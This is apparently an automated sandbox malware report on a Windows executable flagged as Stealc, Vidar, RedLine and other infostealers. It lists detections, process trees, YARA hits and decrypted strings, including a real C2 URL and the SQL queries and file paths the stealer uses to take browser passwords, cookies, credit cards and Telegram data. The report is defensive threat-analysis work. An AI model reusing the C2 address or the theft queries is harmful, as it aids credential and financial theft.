Windows Analysis Report
4BfhCycV4B.exe

Overview

General Information

Sample name: 4BfhCycV4B.exe (renamed because original name is a hash value)
Original sample name: 71ef0fb3be89dc92fcbe7a6e8e6d6ee8.exe
Analysis ID: 1430187
MD5: 71ef0fb3be89dc92fcbe7a6e8e6d6ee8
SHA1: 07b90b69d37fceed0e01a9eab109e62652d9c39d
SHA256: a464f8ca48e3193c3c58bec992d90875712d87a0165c24568e0b09c700364154
Tags: exe, Stealc

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 4BfhCycV4B.exe (PID: 5148 cmdline: "C:\Users\user\Desktop\4BfhCycV4B.exe" MD5: 71EF0FB3BE89DC92FCBE7A6E8E6D6EE8)
    • u3z0.0.exe (PID: 6300 cmdline: "C:\Users\user\AppData\Local\Temp\u3z0.0.exe" MD5: 65A31455A497CAEE44C5AA749C50E40B)
      • WerFault.exe (PID: 1504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 2188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Qg_Appv5.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" MD5: 54D53F5BDB925B3ED005A84B5492447F)
      • UniversalInstaller.exe (PID: 6532 cmdline: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
        • UniversalInstaller.exe (PID: 7120 cmdline: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
          • cmd.exe (PID: 4456 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • MSBuild.exe (PID: 5912 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u3z0.1.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\u3z0.1.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)
    • WerFault.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • UniversalInstaller.exe (PID: 5560 cmdline: "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 4124 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 760 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first to grab information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name: zgRAT
Description: zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT also has infostealer functionality that targets browser information and crypto wallets. It usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\fak | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\fak | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\fak | MALWARE_Win_Arechclient2 | Detects Arechclient2 RAT | ditekSHen
  • 0xb823a:$s14: keybd_event
  • 0xbef6f:$v1_1: grabber@
  • 0xb8e03:$v1_2: <BrowserProfile>k__
  • 0xb987c:$v1_3: <SystemHardwares>k__
  • 0xb993b:$v1_5: <ScannedWallets>k__
  • 0xb99cb:$v1_6: <DicrFiles>k__
  • 0xb99a7:$v1_7: <MessageClientFiles>k__
  • 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField
  • 0xb9dc3:$v1_8: <ScanWallets>k__BackingField
  • 0xb9de0:$v1_8: <ScanScreen>k__BackingField
  • 0xb9e1a:$v1_8: <ScanVPN>k__BackingField
  • 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
  • 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\ypbquxnwo | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\ypbquxnwo | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x1270:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2263644143.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000018.00000002.3282767064.0000000000ABB000.00000002.00000001.01000000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
2.2.u3z0.0.exe.41c0e67.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.u3z0.0.exe.41c0e67.1.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
2.2.u3z0.0.exe.41c0e67.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.u3z0.0.exe.41c0e67.1.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
2.2.u3z0.0.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

No Sigma rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
04/23/24-09:28:00.837763 | 2044243 | 49708 | 80 | TCP | A Network Trojan was detected
04/23/24-09:28:01.224150 | 2044244 | 49708 | 80 | TCP | A Network Trojan was detected
04/23/24-09:28:01.851964 | 2051831 | 80 | 49708 | TCP | A Network Trojan was detected
04/23/24-09:28:01.539793 | 2044246 | 49708 | 80 | TCP | A Network Trojan was detected
04/23/24-09:27:56.592477 | 2856233 | 49705 | 80 | TCP | A Network Trojan was detected
04/23/24-09:28:01.538180 | 2051828 | 80 | 49708 | TCP | A Network Trojan was detected

AV Detection

Source: 4BfhCycV4B.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\fak, Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll, ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\fak, ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll, ReversingLabs: Detection: 18%
Source: 4BfhCycV4B.exe, Virustotal: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\fak, Joe Sandbox ML: detected
Source: 4BfhCycV4B.exe, Joe Sandbox ML: detected
Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, String decryptor:
  • INSERT_KEY_HERE
  • GetProcAddress
  • LoadLibraryA
  • lstrcatA
  • OpenEventA
  • CreateEventA
  • CloseHandle
  • Sleep
  • GetUserDefaultLangID
  • VirtualAllocExNuma
  • VirtualFree
  • GetSystemInfo
  • VirtualAlloc
  • HeapAlloc
  • GetComputerNameA
  • lstrcpyA
  • GetProcessHeap
  • GetCurrentProcess
  • lstrlenA
  • ExitProcess
  • GlobalMemoryStatusEx
  • GetSystemTime
  • SystemTimeToFileTime
  • advapi32.dll
  • gdi32.dll
  • user32.dll
  • crypt32.dll
  • ntdll.dll
  • GetUserNameA
  • CreateDCA
  • GetDeviceCaps
  • ReleaseDC
  • CryptStringToBinaryA
  • sscanf
  • VMwareVMware
  • HAL9TH
  • JohnDoe
  • DISPLAY
  • %hu/%hu/%hu
  • http://185.172.128.76
  • /3cd2b41cbde8fc9c.php
  • /15f649199f40275b/
  • default10
  • GetEnvironmentVariableA
  • GetFileAttributesA
  • GlobalLock
  • HeapFree
  • GetFileSize
  • GlobalSize
  • CreateToolhelp32Snapshot
  • IsWow64Process
  • Process32Next
  • GetLocalTime
  • FreeLibrary
  • GetTimeZoneInformation
  • GetSystemPowerStatus
  • GetVolumeInformationA
  • GetWindowsDirectoryA
  • Process32First
  • GetLocaleInfoA
  • GetUserDefaultLocaleName
  • GetModuleFileNameA
  • DeleteFileA
  • FindNextFileA
  • LocalFree
  • FindClose
  • SetEnvironmentVariableA
  • LocalAlloc
  • GetFileSizeEx
  • ReadFile
  • SetFilePointer
  • WriteFile
  • CreateFileA
  • FindFirstFileA
  • CopyFileA
  • VirtualProtect
  • GetLogicalProcessorInformationEx
  • GetLastError
  • lstrcpynA
  • MultiByteToWideChar
  • GlobalFree
  • WideCharToMultiByte
  • GlobalAlloc
  • OpenProcess
  • TerminateProcess
  • GetCurrentProcessId
  • gdiplus.dll
  • ole32.dll
  • bcrypt.dll
  • wininet.dll
  • shlwapi.dll
  • shell32.dll
  • psapi.dll
  • rstrtmgr.dll
  • CreateCompatibleBitmap
  • SelectObject
  • BitBlt
  • DeleteObject
  • CreateCompatibleDC
  • GdipGetImageEncodersSize
  • GdipGetImageEncoders
  • GdipCreateBitmapFromHBITMAP
  • GdiplusStartup
  • GdiplusShutdown
  • GdipSaveImageToStream
  • GdipDisposeImage
  • GdipFree
  • GetHGlobalFromStream
  • CreateStreamOnHGlobal
  • CoUninitialize
  • CoInitialize
  • CoCreateInstance
  • BCryptGenerateSymmetricKey
  • BCryptCloseAlgorithmProvider
  • BCryptDecrypt
  • BCryptSetProperty
  • BCryptDestroyKey
  • BCryptOpenAlgorithmProvider
  • GetWindowRect
  • GetDesktopWindow
  • GetDC
  • CloseWindow
  • wsprintfA
  • EnumDisplayDevicesA
  • GetKeyboardLayoutList
  • CharToOemW
  • wsprintfW
  • RegQueryValueExA
  • RegEnumKeyExA
  • RegOpenKeyExA
  • RegCloseKey
  • RegEnumValueA
  • CryptBinaryToStringA
  • CryptUnprotectData
  • SHGetFolderPathA
  • ShellExecuteExA
  • InternetOpenUrlA
  • InternetConnectA
  • InternetCloseHandle
  • InternetOpenA
  • HttpSendRequestA
  • HttpOpenRequestA
  • InternetReadFile
  • InternetCrackUrlA
  • StrCmpCA
  • StrStrA
  • StrCmpCW
  • PathMatchSpecA
  • GetModuleFileNameExA
  • RmStartSession
  • RmRegisterResources
  • RmGetList
  • RmEndSession
  • sqlite3_open
  • sqlite3_prepare_v2
  • sqlite3_step
  • sqlite3_column_text
  • sqlite3_finalize
  • sqlite3_close
  • sqlite3_column_bytes
  • sqlite3_column_blob
  • encrypted_key
  • PATH
  • C:\ProgramData\nss3.dll
  • NSS_Init
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: NSS_Shutdown
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11_FreeSlot
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11_Authenticate
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: C:\ProgramData\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: browser:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: profile:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: url:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: login:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: password:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Opera
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: OperaGX
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Network
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: cookies
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: .txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: TRUE
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: FALSE
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: autofill
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: history
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: name:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: month:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: year:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: card:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Cookies
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Login Data
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Web Data
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: History
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: logins.json
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: formSubmitURL
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: usernameField
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: encryptedUsername
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: encryptedPassword
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: guid
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: cookies.sqlite
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: formhistory.sqlite
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: places.sqlite
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: plugins
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Local Extension Settings
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Sync Extension Settings
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: IndexedDB
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Opera Stable
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Opera GX Stable
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: CURRENT
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: chrome-extension_
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Local State
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: profiles.ini
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: chrome
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: opera
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: firefox
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: wallets
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %08lX%04lX%lu
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: ProductName
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: ProcessorNameString
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: DisplayName
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: DisplayVersion
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Network Info:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - IP: IP?
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Country: ISO?
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: System Summary:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - HWID:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - OS:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Architecture:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - UserName:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Computer Name:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Local Time:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - UTC:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Language:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Keyboards:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Laptop:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Running Path:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - CPU:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Threads:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Cores:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - RAM:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - Display Resolution:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: - GPU:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: User Agents:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Installed Apps:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: All Users:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Current User:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Process List:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: system_info.txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: freebl3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: mozglue.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: msvcp140.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: nss3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: softokn3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: vcruntime140.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Temp\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: .exe
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: runas
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: open
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: /c start
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %DESKTOP%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %APPDATA%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %USERPROFILE%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %DOCUMENTS%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %PROGRAMFILES%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: %RECENT%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: *.lnk
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: files
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \discord\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Local Storage\leveldb
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Telegram Desktop\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: key_datas
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: map*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: F8806DD0C461824F*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Telegram
